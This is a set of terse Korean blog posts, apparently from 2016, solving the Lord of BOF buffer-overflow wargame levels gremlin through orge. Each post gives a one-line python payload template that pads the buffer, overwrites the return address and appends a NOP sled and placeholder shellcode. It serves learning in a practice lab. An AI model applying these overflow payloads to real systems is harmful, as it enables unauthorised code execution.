$bash

'0x0400 : Wargame/0x0402 : LOB'에 해당되는 글 8건

  1. LOB_darkelf > orge
  2. LOB_wolfman > darkelf
  3. LOB_orc > wolfman
  4. LOB_goblin > orc
  5. LOB_coblot > goblin
  6. LOB_gremlin > cobolt
  7. LOB_gate > gremlin
  8. Lord of bof.

LOB_darkelf > orge

0x0400 : Wargame/0x0402 : LOB


//  argv[1] 길이제한을 걸었는데...argv[0]에도 길이를 또 체크한다.


cp ~/orge `python -c 'print "A"*75'`

// 정보) './' 는 2바이트이다.


./python -c print "A"*75'` `python -c 'print "A"*44+"address_"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_wolfman > darkelf  (0) 2016.09.12
LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12

LOB_wolfman > darkelf

0x0400 : Wargame/0x0402 : LOB


// 점점 짤리기 시작.

// argv[1] 길이 제한


./darkelf `python -c 'print "A"*44+"address_"+"\x90"*100000+"shellcode"'`


// "주소" 에서 뒤쪽(오른쪽) 공간을 주면 argv[2]로 가는거 같다...?

// 페이로드에 공간을 넣어주면 인자로 구분가능. > 여러 인자로 넣을수 있다.

'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_darkelf > orge  (0) 2016.09.12
LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12

LOB_orc > wolfman

0x0400 : Wargame/0x0402 : LOB


// 흠......

// 아몰랑 놉썰갓


./wolfman `python -c 'print "A"*44+"address"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_darkelf > orge  (0) 2016.09.12
LOB_wolfman > darkelf  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12

LOB_goblin > orc

0x0400 : Wargame/0x0402 : LOB


// 에그헌터 = 환경변수 ㅗ

// argv[1] 47th > \xbf


./orc `python -c 'print "A"*44+"address"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_wolfman > darkelf  (0) 2016.09.12
LOB_orc > wolfman  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12

LOB_coblot > goblin

0x0400 : Wargame/0x0402 : LOB


// 표준 스트림, 작은 버퍼

// stdin을 가지고 노는것을 모르겠다...그냥 쉘주소 가져와서 품.


환경변수 씀.


(python -c 'print "A"*20+"address"'`;cat) | ./goblin


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12
Lord of bof.  (0) 2016.09.07

LOB_gremlin > cobolt

0x0400 : Wargame/0x0402 : LOB


// 작은 버퍼할당 > 리턴 뒤 할당.


./coblot `python -c 'print "A"*20+"address"+"\x90"*100000+"shellcode"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12
Lord of bof.  (0) 2016.09.07

LOB_gate > gremlin

0x0400 : Wargame/0x0402 : LOB


// 심플 bof.


./gremlin `python -c 'print "A"*(버퍼+sfp)+"shellcode"+"return"'`


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
Lord of bof.  (0) 2016.09.07

Lord of bof.

0x0400 : Wargame/0x0402 : LOB


fin....


// Q. LOB던전 (1/3)

// Q. LOB분석 (0/1)


'0x0400 : Wargame > 0x0402 : LOB' 카테고리의 다른 글

LOB_orc > wolfman  (0) 2016.09.12
LOB_goblin > orc  (0) 2016.09.12
LOB_coblot > goblin  (0) 2016.09.12
LOB_gremlin > cobolt  (0) 2016.09.12
LOB_gate > gremlin  (0) 2016.09.12